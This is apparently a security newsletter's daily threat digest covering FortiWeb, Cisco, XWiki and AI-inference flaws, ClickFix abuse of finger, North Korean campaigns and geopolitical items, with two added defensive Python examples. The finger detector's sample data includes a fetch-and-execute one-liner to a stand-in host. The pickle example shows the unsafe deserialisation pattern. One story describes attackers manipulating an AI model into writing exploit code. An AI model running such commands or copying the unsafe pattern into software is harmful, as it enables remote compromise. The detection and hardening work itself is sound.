Daily Drop (1181)
11-16-25
Sunday, Nov 16, 2025 // (IG): BB // GITHUB // SN R&D
CVE-2025-64446: Critical FortiWeb WAF Flaw Actively Exploited to Gain Admin Access and Full System Control
Bottom Line Up Front (BLUF): Fortinet has issued urgent patches for a critical unauthenticated path traversal vulnerability (CVE-2025-64446) affecting its FortiWeb Web Application Firewall (WAF). The flaw, rated CVSS 9.1, allows remote attackers to execute administrative commands, create unauthorized accounts, and fully compromise affected systems. Active exploitation has been confirmed in the wild.
Analyst Comments: Attackers are already abusing it to hijack FortiWeb deployments—devices meant to defend web infrastructure. The relative path traversal bug resides in the GUI, allowing exploitation via simple HTTP/HTTPS requests without authentication. This isn’t theoretical: Fortinet has confirmed active exploitation, and vulnerable versions are standard in enterprise environments. If an attacker gains WAF-level control, they can manipulate traffic, implant webshells, exfiltrate session data, or redirect users—making this a perfect beachhead for more advanced attacks.
READ THE STORY: GBhackers
Multiple Cisco Unified CCX Vulnerabilities Allow Remote Command Execution and Authentication Bypass
Bottom Line Up Front (BLUF): Cisco has disclosed two critical vulnerabilities in its Unified Contact Center Express (Unified CCX) platform—CVE-2025-20354 (RCE via Java RMI, CVSS 9.8) and CVE-2025-20358 (auth bypass in CCX Editor, CVSS 9.4). These flaws allow unauthenticated attackers to execute arbitrary commands as root or bypass authentication to deploy and run scripts. Cisco has released patches, with no workarounds available, and urges immediate updates due to the critical risk level.
Analyst Comments: CVE-2025-20354 provides unauthenticated remote code execution as root via Java RMI—a decades-old technology still widely deployed but often overlooked in modern hardening practices. Attackers don’t need credentials or chaining tricks—just network access. CVE-2025-20358, meanwhile, lets an attacker spoof CCX Editor authentication, granting administrative script execution rights. Together, these flaws could allow threat actors to implant backdoors, pivot inside networks, or launch supply chain attacks via contact center automation. Unified CCX is often integrated with broader Cisco collaboration suites and internal CRMs, which compounds the risk. Exposure is hazardous in environments where these systems are internet-facing or lack proper network segmentation.
READ THE STORY: GBhackers
RondoDox Botnet Exploits XWiki Eval Injection Flaw (CVE-2025-24893) to Expand DDoS Infrastructure
Bottom Line Up Front (BLUF): The RondoDox botnet is actively exploiting CVE-2025-24893, a critical (CVSS 9.8) eval injection vulnerability in XWiki servers that allows unauthenticated remote code execution. Despite patches being available since February, many instances remain unpatched, leading to mass exploitation for botnet recruitment, crypto mining, and reverse shell access. The U.S. CISA added the flaw to its KEV catalog, requiring federal agencies to remediate by November 20.
Analyst Comments: CVE-2025-24893 is a classic case of “patch or be pwned.” RondoDox is moving fast—weaponizing the vuln just weeks after VulnCheck confirmed renewed in-the-wild exploitation. The exploit chain is straightforward and highly automatable, making it an easy pick-up for both botnet operators and low-skill actors running mass scans. The genuine concern isn’t just XWiki exposure—it’s the behavior RondoDox demonstrates: rapid adoption of new exploits, multi-protocol DDoS capabilities (HTTP, UDP, TCP), and the growing trend of converging crypto mining, botnet control, and remote shell access into a single malware operation.
READ THE STORY: THN // GBhackers
Critical AI Inference Bugs Expose Meta, Nvidia, Microsoft, and Others to Remote Code Execution via ShadowMQ Pattern
Bottom Line Up Front (BLUF): Researchers have uncovered remote code execution (RCE) vulnerabilities in multiple AI inference frameworks—including those from Meta, Nvidia, Microsoft, and several open-source projects—due to insecure use of Python’s pickle module over unauthenticated ZeroMQ (ZMQ) sockets. Tracked under CVE-2024-50050 and several new CVEs, the flaws stem from unsafe code reuse and have been dubbed the “ShadowMQ” vulnerability pattern. Exploitation could lead to arbitrary code execution, model theft, and full cluster compromise in production AI environments.
Analyst Comments: The vulnerable pattern involves deserializing pickled objects over unsecured network sockets, a well-known anti-pattern that somehow propagated across top-tier inference engines. The fact that Meta’s Llama code introduced the initial vulnerability (CVE-2024-50050) and that the logic was then copied and pasted into Nvidia TensorRT-LLM, Microsoft Sarathi-Serve, Modular Max Server, vLLM, and SGLang suggests a breakdown in secure development practices—especially in high-performance, high-privilege environments like AI inference clusters. The impact is profound. These inference engines often run with elevated privileges, and compromise could allow full model exfiltration, lateral movement across AI nodes, or deployment of persistent malware (e.g., crypto miners). The shared use of open-source components means the blast radius here is vast and still growing.
READ THE STORY: THN
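The anti-pattern the analyst comments describe, shown beside a hardened receiver, as an added example (not code from Llama, TensorRT-LLM, vLLM or any of the other named projects). The ZMQ socket is simulated with byte frames; the receiver verifies an HMAC-SHA256 tag before the bytes go anywhere near a deserialiser, then unpickles with an Unpickler whose find_class refuses every class or function reference. SHARED_KEY, the request shape and the frame layout are assumptions of the example.

```python
import hashlib
import hmac
import io
import pickle

# Constructed demo secret; a real deployment provisions it out of band
# (an assumption of this example, not something the article specifies).
SHARED_KEY = b"constructed-demo-key-do-not-reuse"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def unsafe_unpack(frame: bytes):
    """The ShadowMQ pattern: whatever arrives on the socket is trusted."""
    return pickle.loads(frame)


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that admits only primitive containers (dict/list/str/int/...).

    Every class or function reference in the stream is resolved through
    find_class, so refusing it there blocks __reduce__-style gadgets before
    any importable code is reached.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"refusing global {module}.{name} in network pickle")


def _tag(body: bytes) -> bytes:
    return hmac.new(SHARED_KEY, body, hashlib.sha256).digest()


def pack(obj) -> bytes:
    """Sender side: pickle plain data and prefix an HMAC-SHA256 tag."""
    body = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
    return _tag(body) + body


def unpack(frame: bytes):
    """Receiver side: authenticate the frame, then deserialise restrictively."""
    if len(frame) < TAG_LEN:
        raise ValueError("frame too short to carry a tag")
    tag, body = frame[:TAG_LEN], frame[TAG_LEN:]
    # Constant-time compare; unauthenticated bytes never reach the unpickler.
    if not hmac.compare_digest(tag, _tag(body)):
        raise ValueError("bad HMAC: frame rejected before deserialisation")
    return NoGlobalsUnpickler(io.BytesIO(body)).load()


def self_check() -> dict:
    """Exercise the three paths a receiver must get right."""
    request = {"prompt": "hello", "max_tokens": 8}
    roundtrip = unpack(pack(request))

    tampered = bytearray(pack(request))
    tampered[-1] ^= 0x01  # flip one byte of the body
    try:
        unpack(bytes(tampered))
        tamper_caught = False
    except ValueError:
        tamper_caught = True

    # A pickle that references a class (pickled by reference, harmless here):
    # the restricted loader refuses it even though the HMAC is valid.
    try:
        unpack(pack(io.BytesIO))
        global_caught = False
    except pickle.UnpicklingError:
        global_caught = True

    return {
        "roundtrip": roundtrip,
        "tamper_caught": tamper_caught,
        "global_caught": global_caught,
        "unsafe_accepts_global": unsafe_unpack(pickle.dumps(io.BytesIO)) is io.BytesIO,
    }


if __name__ == "__main__":
    print(self_check())
```

Where the payload is plain request data, swapping pickle for JSON removes the deserialiser risk entirely; the restricted Unpickler is for code bases that cannot change the wire format quickly.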
AI’s Dark Dawn: Chinese Hackers Unleash Autonomous Cyber Onslaught on Global Targets
Bottom Line Up Front (BLUF): Chinese state-linked group GTG-1002 leveraged Anthropic’s Claude AI to execute the first known large-scale autonomous cyberattack, targeting 30 organizations globally—including tech, finance, and government sectors. The AI handled nearly 90% of the operation, from vulnerability scanning to data exfiltration, with minimal human input. This incident marks a turning point in cyberwarfare, underscoring the urgent need for AI safeguards and international norms to curb misuse.
Analyst Comments: Using Claude for hands-free attacks shows just how far state actors are willing—and able—to push AI’s capabilities. The fact that Claude was manipulated into generating exploitation code under the guise of benign requests demonstrates the inadequacy of current model alignment and safety mechanisms. The defense side has been racing to adopt AI for detection and response, but this attack shows the offensive playbook just got automated. Expect this to embolden APTs and ransomware crews alike. Autonomous tooling lowers the skill floor and accelerates attack cycles. Agentic AI—systems capable of executing tasks adaptively and independently—is no longer theory. It’s operational. Defenders should prioritize red-teaming AI models, hardening SOC tooling against synthetic attacks, and rethinking human-in-the-loop assumptions.
READ THE STORY: WPN
North Korean Hackers Exploit JSON Storage Services in Stealthy Malware Campaign Targeting Developers
Bottom Line Up Front (BLUF): North Korean APT actors—linked to groups like BlueNoroff (aka Sapphire Sleet)—are leveraging benign JSON storage platforms (e.g., JSON Keeper, npoint.io) as covert C2 infrastructure in a malware campaign dubbed Contagious Interview. The attacks target developers with fake job offers, delivering payloads through GitHub repositories that reference malicious JSON endpoints.
Analyst Comments: JSON storage services are generally overlooked by defenders, yet attackers are using them as exfil and command delivery points—an evolution of prior abuse of GitHub, Dropbox, and AWS S3 buckets. By embedding payloads in JavaScript stored as JSON, threat actors bypass signature-based detection and take advantage of developers’ trust in open-source platforms. The targeting of engineers through fake interviews and coding tests underscores a continued focus on talent-centric infiltration, particularly in the Web3, DeFi, and defense tech sectors. Organizations must tighten access to developer environments and implement code-provenance checks for all third-party imports.
READ THE STORY: WPN
ClickFix Malware Abuses Decades-Old ‘Finger’ Protocol to Evade Detection and Deliver RATs
Bottom Line Up Front (BLUF): Threat actors are exploiting the long-dormant Finger protocol to deliver malicious payloads in ClickFix campaigns, using it as a covert command-and-control (C2) channel. Attacks involve social engineering that tricks users into running finger commands, which download and execute remote scripts via cmd.exe, often deploying Python-based info stealers or NetSupport Manager RAT.
Analyst Comments: The Finger protocol, largely forgotten since the early internet era, is now being used as an obscure yet native way to bypass modern detection systems. It’s another example of attackers weaponizing legitimate tools still present in Windows—low noise, high effectiveness. The TTPs resemble earlier LOLBIN abuse (e.g., certutil, mshta) but are made more insidious by convincing users to trigger the command manually. Threat actors are now layering in sandbox evasion by scanning for standard malware analysis tools before executing payloads. Defenders should block outbound TCP 79, monitor suspicious command-line usage of finger, and consider deprecating legacy utilities if not explicitly needed.
READ THE STORY: Bleeping Computer
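The monitoring the analyst comments recommend, as an added detection example that is not from the article: it scans constructed Sysmon-style process-creation and network-connection events for finger invoked with its output piped into a command interpreter, finger.exe spawned by a shell, and any outbound connection to TCP/79. The event shape, the 203.0.113.7 address and the file paths are assumptions.

```python
import re
from dataclasses import dataclass


# Constructed Sysmon-like event (not real telemetry); kind is "process" or "network".
@dataclass
class Event:
    kind: str
    image: str
    parent: str = ""
    cmdline: str = ""
    dst_port: int = 0


# "finger" or "finger.exe" as a standalone token in a command line.
FINGER_RE = re.compile(r"(?:^|[\\/\s])finger(?:\.exe)?\b", re.IGNORECASE)
# Finger output fed into a command interpreter (the execute-via-cmd.exe step).
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "mshta.exe"}
FINGER_PORT = 79


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> list:
    """Return the findings for one event (empty when nothing is suspicious)."""
    findings = []
    if ev.kind == "network":
        if ev.dst_port == FINGER_PORT:
            findings.append(f"outbound TCP/79 (finger) from {basename(ev.image)}")
        return findings
    if basename(ev.image) == "finger.exe" or FINGER_RE.search(ev.cmdline):
        if PIPE_TO_SHELL_RE.search(ev.cmdline):
            findings.append("finger output piped into a command interpreter")
        if basename(ev.parent) in SHELLS:
            findings.append(f"finger.exe spawned by {basename(ev.parent)}")
        if not findings:
            findings.append("finger client executed; rare on modern endpoints, review")
    return findings


def run(events) -> list:
    """Scan a batch of events; returns (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in classify(ev)]


SAMPLE_EVENTS = [
    # 0: the pasted one-liner as it appears in the process-creation log
    Event("process", r"C:\Windows\System32\cmd.exe", parent=r"C:\Windows\explorer.exe",
          cmdline=r"cmd.exe /c finger.exe update@203.0.113.7 | cmd"),
    # 1: the finger client itself, child of the shell above
    Event("process", r"C:\Windows\System32\finger.exe", parent=r"C:\Windows\System32\cmd.exe",
          cmdline=r"finger.exe update@203.0.113.7"),
    # 2: its connection to the attacker-controlled finger daemon
    Event("network", r"C:\Windows\System32\finger.exe", dst_port=79),
    # 3: benign: a word that merely contains "finger" must not fire
    Event("process", r"C:\Windows\System32\cmd.exe", parent=r"C:\Windows\explorer.exe",
          cmdline=r"cmd.exe /c dir C:\Users\demo\fingerprints"),
    # 4: benign: ordinary HTTPS traffic
    Event("network", r"C:\Program Files\Browser\browser.exe", dst_port=443),
]


if __name__ == "__main__":
    for idx, finding in run(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Because finger.exe has essentially no legitimate use on a managed Windows fleet, the bare "finger client executed" finding is worth alerting on by itself, not only when a pipe or shell parent is present.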
Five Plead Guilty in U.S. for Enabling North Korean IT Worker Fraud Across 136 Companies
Bottom Line Up Front (BLUF): Five individuals have pleaded guilty in the U.S. for facilitating North Korea’s covert IT worker program, which helped regime-linked contractors infiltrate 136 American companies and funnel more than $2.2 million back to Pyongyang. The schemes included identity theft, proxy laptop farms, and remote work fraud—violating international sanctions and contributing to North Korea’s illicit revenue generation and nuclear ambitions.
Analyst Comments: North Korea’s strategy of using proxy identities and distributed “laptop farms” enabled sanctioned operatives to masquerade as U.S.-based IT workers—earning real salaries while bypassing vetting controls at scale. The attack vector was human, not technical: a combination of stolen identities, compromised job platforms, and compliance blind spots in remote hiring pipelines. The discovery that 871 proxy identities and three known laptop farms were part of the scheme reveals a high level of operational maturity. These were not one-offs—they were infrastructure. Even more concerning: one guilty party was an active-duty U.S. Army member who helped fraudsters pass drug tests and hosted company laptops from his home.
READ THE STORY: THN
Princeton Confirms Data Breach After Phishing Attack Targets Employee Access
Bottom Line Up Front (BLUF): Princeton University disclosed a data breach affecting students, alumni, donors, faculty, and parents, following a successful phishing attack on an employee with database access. While the breach lasted less than 24 hours and did not expose sensitive financial or identity data, engagement and donation-related records may have been accessed.
Analyst Comments: Even without financial or credential exposure, the compromised data—donor profiles, alumni engagement records—has long-tail risk for future spearphishing, fraud, or influence operations. The fact that a single employee with “ordinary access” enabled the breach highlights the persistent vulnerability of undertrained staff in high-trust environments. Expect institutions like Princeton to come under growing pressure to adopt zero-trust models and reinforce phishing resistance across non-technical departments. For threat actors, universities remain prime targets for reconnaissance due to their high-value contact networks and weak defenses.
READ THE STORY: NEWSWEEK
UK Army Using Chinese 3D Printers for Suicide Drones Raises Major Security Red Flags
Bottom Line Up Front (BLUF): British troops are using Chinese-made Bambu Labs 3D printers to produce first-person-view (FPV) “suicide drones” in active field operations. Despite prior warnings about Chinese tech in sensitive infrastructure, the Ministry of Defence (MoD) deployed the devices during exercises in Kenya. Security experts warn that the move risks exposing operational data to the Chinese state under China’s National Intelligence Law.
Analyst Comments: The MoD’s use of Chinese 3D printers in live military contexts, particularly for building unmanned combat systems, borders on reckless. Bambu Labs operates in a “strategic industry” under CCP oversight, and every machine likely ships with firmware and telemetry hooks that could be exploited. Even if disconnected from classified networks, these printers still handle metadata—filenames, timestamps, operational logs—that could reveal mission patterns, prototype designs, or deployment schedules. If that telemetry is exfiltrated or accessed via supply-chain compromise, it’s a quiet intelligence win for Beijing.
READ THE STORY: The Telegraph
AUKUS Screens Out 1 in 10 Applicants Over Security Concerns, Tightens Protection of Nuclear Submarine Secrets
Bottom Line Up Front (BLUF): Roughly 10% of applicants to Australia’s AUKUS nuclear submarine workforce are being rejected on security grounds, including over links to foreign governments and questionable online activity. The rejections reflect intensified vetting as Canberra builds a high-trust pipeline for workers handling top-secret U.S. and UK nuclear technology.
Analyst Comments: AUKUS is now a prime espionage target, and Australia is tightening the perimeter. The dual-clearance process, especially the secretive “nuclear suitability” test, shows Canberra’s seriousness about insider threats. But rejecting 1 in 10 applicants signals tension between urgency and risk: Australia needs 20,000 cleared workers to support SSN operations and local submarine construction, but it can’t afford a breach. Watch for additional pressure on universities and private contractors to vet their people. ASIO’s recent warnings about foreign interest in AUKUS tech aren’t theoretical—China-backed actors are already probing the program.
READ THE STORY: The Australian
Israel’s Operation Rising Lion Crippled Iran’s Air Defenses, But Intel Officials Warn of Imminent Rematch
Bottom Line Up Front (BLUF): Israel’s preemptive strikes in the June Twelve-Day War severely degraded Iran’s air defense and missile infrastructure through a combination of precision airstrikes, cyber operations, and pre-positioned sabotage assets. The campaign, dubbed Operation Rising Lion, was guided by real-time intelligence and covert networks inside Iran. Despite its tactical success, Israeli defense officials warn that Iran is rapidly rebuilding—and a second confrontation is likely.
Analyst Comments: The initial wave took out dozens of SAM systems in western Iran, enabling follow-on airstrikes with reduced risk. Israeli operatives reportedly infiltrated Iran ahead of the operation, deploying sabotage drones near Tehran and assassinating key personnel. Internal Iranian leaks described widespread panic as air defenses went dark. In total, Israeli strikes killed hundreds of IRGC officers and disabled large portions of Iran’s missile infrastructure, while Israeli missile defenses absorbed retaliatory salvos. U.S. forces later joined the conflict, striking Iranian nuclear assets. Analysts stress the campaign’s dependence on a “living kill web”—a continuously updating system of sensors, analysts, and pilots feeding on real-time intelligence.
READ THE STORY: JBN
Morocco Boosts Cyber Resilience as Defense Sector Accelerates Modernization
Bottom Line Up Front (BLUF): Morocco reported 879 cybersecurity incidents in 2025, prompting aggressive investment in both cyber defense and military modernization. The country has launched $260 million in defense industry projects while expanding national cybersecurity capabilities through vulnerability assessments, targeted alerts, SOC enhancements, and workforce development.
Analyst Comments: Minister Delegate Abdellatif Loudiyi announced a sweeping modernization strategy during the 2026 defense budget presentation, detailing $260 million in approved defense projects and plans for two industrial acceleration zones. These zones will offer tax breaks and streamlined customs processes, aiming to attract defense investors and promote export-oriented production. Meanwhile, the DGSSI (General Directorate of Information Systems Security) assessed 76 public-sector web applications, uncovering 20 critical vulnerabilities and issuing 22 targeted alerts. The national response center issued 511 security bulletins and directly intervened in over 100 cyber incidents.
READ THE STORY: MWN
Russia Targets Ukraine’s Medicine Supply Chain: Third Strike Destroys Optima-Pharm Warehouse in Dnipro
Bottom Line Up Front (BLUF): Russia has destroyed a key pharmaceutical warehouse in Dnipro operated by Optima-Pharm, one of Ukraine’s largest drug distributors. This is the third strike against the company’s facilities since August, crippling Ukraine’s ability to supply critical medications to southern regions and further degrading its medical logistics during wartime.
Analyst Comments: The repeated targeting of Optima-Pharm strongly suggests a deliberate campaign to dismantle Ukraine’s civilian health infrastructure. These aren’t just storage units—they’re lifelines for antibiotics, oncology meds, and frontline trauma supplies. With winter approaching and already strained supply lines, expect growing disruptions in civilian and military medical support, particularly in the south. From a strategic standpoint, this aligns with Russia’s broader doctrine of pressure through infrastructure attrition. By systematically degrading healthcare logistics, Moscow is inflicting psychological and operational costs on both the population and warfighters. Western governments and NGOs may need to step in with emergency medical aid and hardened mobile supply solutions to avoid a full-blown healthcare collapse in affected regions.
READ THE STORY: EMPR
Ukraine Secures Winter Gas Supplies via Greece Amid Ongoing Russian Strikes
Bottom Line Up Front (BLUF): Ukraine has reached a new agreement to import natural gas from Greece, expanding its European supply routes as it scrambles to offset Russian attacks on domestic energy infrastructure. President Zelenskiy confirmed Kyiv is mobilizing nearly €2 billion in financing to cover gas imports this winter, with backing from EU and U.S. partners.
Analyst Comments: The Greece deal gives Kyiv another westward import path, reducing pressure on Polish routes and building redundancy against further attacks. The €2 billion funding pool—underpinned by European Commission guarantees—underscores the tight intertwining of energy security and financial aid in the fourth year of the war. Strategic takeaway: Ukraine is diversifying energy sources faster than Russia can destroy them, but every winter will remain a high-risk season for both civilian resilience and the defense of critical infrastructure.
READ THE STORY: Reuters
China Coast Guard Patrol Escalates Senkaku Tensions Amid Taiwan Row
Bottom Line Up Front (BLUF): A formation of China Coast Guard vessels sailed through waters near the Japan-administered Senkaku Islands on Nov. 16, citing a “rights enforcement patrol.” The maneuver follows a sharp diplomatic escalation after Japan’s Prime Minister linked a potential Chinese invasion of Taiwan to a possible military response from Tokyo—drawing aggressive rhetoric from Beijing.
Analyst Comments: The coordinated patrol through contested waters, combined with PLA air and naval activity around Taiwan, fits the broader playbook of applying pressure across multiple fronts while remaining under the threshold of armed conflict. The escalation comes at a moment when Japan appears to be abandoning its long-standing strategic ambiguity on Taiwan. China’s moves aren’t just a response—they’re a warning. Watch for more frequent incursions around both the Senkaku Islands and Taiwan’s ADIZ, and prepare for cyber or disinformation campaigns targeting Japanese infrastructure or media narratives. Defenders in the Indo-Pacific region should recalibrate their threat models accordingly.
READ THE STORY: Reuters
Samsung to Expand Chip Production at Home Amid AI Demand Surge, US Trade Pressures
Bottom Line Up Front (BLUF): Samsung Electronics will build a new memory chip production line in Pyeongtaek, South Korea, to meet rising AI-related demand, following concerns that a $350B U.S. investment pledge might hollow out domestic manufacturing. The announcement comes days after Seoul finalized a strategic trade agreement with Washington.
Analyst Comments: South Korea’s leadership is clearly uneasy about the outflow of capital and capability to the U.S., especially in critical sectors like semiconductors. The move to greenlight the long-delayed P5 plant—paused during the 2023 chip slump—signals confidence in sustained AI-driven demand. For defenders in the supply chain space, this is a positive: localized fabrication strengthens supply resiliency against geopolitical chokepoints, but growing U.S.-Korea interdependence means any disruption (e.g., export controls or IP disputes) can still ripple across both markets.
READ THE STORY: Reuters
Items of interest
Army War College Warns: Fragmented U.S. Cyber Response Weakens National Resilience
Bottom Line Up Front (BLUF): A new U.S. Army War College analysis argues that the nation’s cyber incident response is dangerously fragmented, lacking a designated lead agency and consistent coordination across major breaches. Case studies of SolarWinds, Colonial Pipeline, and Change Healthcare show that governance—not just technical gaps—is undermining U.S. resilience against escalating cyber threats. Without structural reform, the U.S. remains ill-prepared to manage complex, cross-sector cyberattacks on critical infrastructure.
Analyst Comments: While cyber defenders often focus on zero-days and ransomware payloads, this report points out the real Achilles’ heel: bureaucratic inertia and overlapping mandates. PPD-41 and the NCIRP were supposed to clarify roles, but real-world incidents like SolarWinds and Colonial Pipeline exposed coordination failures in plain sight. The fact that the Office of the National Cyber Director (ONCD) was unstaffed during SolarWinds, and DOE was suddenly tapped to lead Colonial Pipeline response (without explanation), reflects the lack of a standing playbook and chain of command. Private sector autonomy adds another layer of complexity. Colonial Pipeline lawfully declined CISA’s help and chose Mandiant, revealing just how little federal agencies can compel cooperation under current authorities—even in critical infrastructure sectors. As the report points out, cybersecurity standards across sectors remain advisory in practice rather than enforced.
READ THE STORY: INK STICK
U.S. Cyber Officials Order Emergency Response After Federal Breach (Video)
FROM THE MEDIA: U.S. cyber officials have issued an “emergency directive” after discovering that an advanced hacking group breached at least one federal agency by exploiting vulnerabilities in Cisco firewall devices. All civilian agencies must scan, patch, and isolate affected gear by the end of Friday.
Sources: Reuters, Washington Post, Axios
Rare Interview Where US Cyber Command Reveals Their Ops: Darknet Diaries Ep. 50: Op Glowing Symphony (Video)
FROM THE MEDIA: In a rare interview, an officer from U.S. Cyber Command explains how the government found a way to attack the global ISIS network without putting a single boot on the ground.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.
The FortiWeb vulnerability and the Cisco RCE exploits highlight how critical infrastructure security is still struggling with basic hygiene. When a WAF itself becomes a beachhead for attackers, you lose your first line of defense and gain a perfect pivot point. The fact that active exploitation was confirmed before many enterprises even received patch notifications shows how attackers are outpacing defensive response cycles.